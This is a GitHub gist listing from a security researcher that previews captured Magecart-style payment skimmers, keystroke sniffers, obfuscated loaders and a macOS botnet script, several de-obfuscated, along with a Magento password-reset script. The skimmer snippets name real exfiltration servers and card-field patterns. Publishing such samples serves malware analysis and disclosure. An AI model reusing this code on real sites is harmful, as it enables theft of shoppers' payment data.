Skip to content

Instantly share code, notes, and snippets.

Willem de Groot gwillem

Block or report user

Report or block gwillem

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@gwillem
gwillem / keystroke_sniffer_1.js
Last active May 18, 2019
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
View keystroke_sniffer_1.js
var sniffData = {};
sniffData['Gate'] = 'https://font-assets.com/img';
sniffData['Data'] = {};
sniffData['Sent'] = [];
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no
@gwillem
gwillem / main.py
Last active Apr 23, 2019
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
View main.py
import os
import pwd
import random
import string
import urllib, urllib2
import json
import time
import sys
import base64
import random
@gwillem
gwillem / enforce-passwd-change.sh
Created Mar 4, 2019
Enforce new passwords for all Magento1 staff users
View enforce-passwd-change.sh
# Requires n98-magerun
n98-magerun admin:user:list --format=csv | grep ,active | while read row;
do
user=$(echo $row | cut -d, -f2)
pass=$(tr -cd '[:alnum:]' < /dev/urandom | fold -w10 | head -n1)
echo "$user -> $pass"
n98-magerun admin:user:change-password $user $pass >/dev/null
done
@gwillem
gwillem / onlineclouds.cloud_conversion_async_unfuscated.js
Created Nov 19, 2018
Malware from onlineclouds.cloud unfuscated
View onlineclouds.cloud_conversion_async_unfuscated.js
setTimeout(checkForCheckout, 100);
var snd = null;
function checkForCheckout() {
if ((/onepage|firecheckout|Checkout|onestepcheckout|onepagecheckout|checkout|oscheckout|idecheckoutvm|fancycheckout/).test(window.location)) {
scrapeAllFields();
}
}
function createQueryString() {
View secure.livechatinc.org.js
var Base64;
function setSavedAddr() {
var B0f;
B0f = jQuery(`select[name=' billing_address_id '] :selected`).text();
}
function encryptData(n0f, k0f) {
var y0f, h8V, m8V, x8V;
@gwillem
gwillem / infowarstores.com.js
Created Nov 13, 2018
de-obfuscated infowarsstore.com payment skimmer as detected on 2018-11-12 by https://twitter.com/gwillem
View infowarstores.com.js
var idString = "id",
nameString = "name",
tokenOrCSRF = new RegExp("token|search|csfr|keyword|button"),
zoneRegionStateCountry = new RegExp("zone|region|state|country"),
formObj = {},
formLength = 0,
emptyString = "",
devToolsStatus = {
open: !1,
orientation: null
@gwillem
gwillem / techrabbit.com.js
Last active Oct 9, 2018
TechRabbit.com busted by Magecart again. Malware hosted at checkercarts.com / exfil server itenvoirtech.com
View techrabbit.com.js
var protocol = window.location.protocol != 'https:' ? 'http://' : 'https://';
var hostname = window.location.host;
var fieldNameRegex = 'shipping|billing|payment|cc|month|card|year|expiration|exp|cvv|cid|code|ccv|authorize|firstname|lastname|street|city|phone|number|email|zip|postal|region|country';
var ccRegex = '[0-9]{13,16}|[0-9 -]{16,20}';
var fieldTypeRegex = 'select|password|checkbox|radio|text|hidden|number|tel|email';
var orderButtons = 'a[title*=\'Place Order\'],a[href*=\'javascript: ; \'],a[href*=\'javascript: void (0)\'],a[href*=\'javascript: void (0); \'],a[href=\'#\'],button,input,submit,.btn,.button';
var emptyString = '';
var saveOrderURL = window.location.href.substr(window.location.href.replace('://', '').indexOf('/') + 3) + '/' + 'saveOrder';
var emptyList = [];
var dropServers = ['itenvoirtech.com'];
@gwillem
gwillem / pageseal.js
Created Sep 16, 2018
Page Seal partially de-obfuscated
View pageseal.js
const jsdom = require("jsdom");
const { JSDOM } = jsdom;
const dom = new JSDOM(`<!DOCTYPE html><p>Hello world</p>`,
{ url: "https://example.org/" });
var window = dom.window
var document = window.document
var $ = require("jquery")(window);
var jQuery = $;
You can’t perform that action at this time.